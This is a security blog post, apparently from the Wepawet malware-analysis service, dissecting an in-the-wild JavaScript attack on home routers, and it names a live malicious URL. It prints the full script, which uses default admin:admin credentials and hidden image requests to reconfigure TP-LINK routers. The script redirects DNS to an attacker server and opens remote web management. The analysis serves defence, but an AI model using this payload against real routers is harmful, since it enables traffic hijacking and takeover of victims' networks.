We have recently noticed submissions on Wepawet that try to access local IP addresses. This is of particular interest since the attacker’s intention is to tamper with the configuration of the victim’s home router.

A live example is located at http://freemdsv.com/ad.php?pid=20120811

if (MSIE = navigator.userAgent.indexOf("MSIE") == -1) { document.writeln("<div style=\'display:none\'>"); function ip1() { i = new Image; i.src = 'http://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced'; } document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip1()>'); function ip3() { ii = new Image; ii.src = 'http://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8'; } document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip3()>'); document.writeln("</div>"); }

The script basically checks to see if the router is accessible through an image request to:

http://admin:admin@192.168.1.1/images/logo.jpg

So it expects that the router is left in the default configuration with username/password as admin:admin and that it is accessible from the IP address 192.168.1.1. The functions ip1 and ip3 are responsible for the malicious reconfiguration of the router with the following requests:

http ://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced

and

http ://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8

The file “PPPoECfgAdvRpm.htm" seems to be the configuration of PPPoE Advanced Settings for TP-LINK routers (link). It is very interesting that they change the victim’s DNS servers to 58.221.59.217 and 114.114.114.114, which means that the victim is susceptible to Man-in-the-middle attacks.

The second request reconfigures the router to be remotely accessible through it’s web interface (link). This way the attacker can remotely change the settings of the victim’s router at its will.

A few reports from Wepawet that perform such attacks are here:

Wepawet report

Wepawet report

Wepawet report

Wepawet report

Wepawet report

Wepawet report

Wepawet report

Wepawet report

Wepawet report

Wepawet report

If you see any related scripts in the wild or you have information what the DNS servers are targeting feel free to contact me on twitter: @kapravel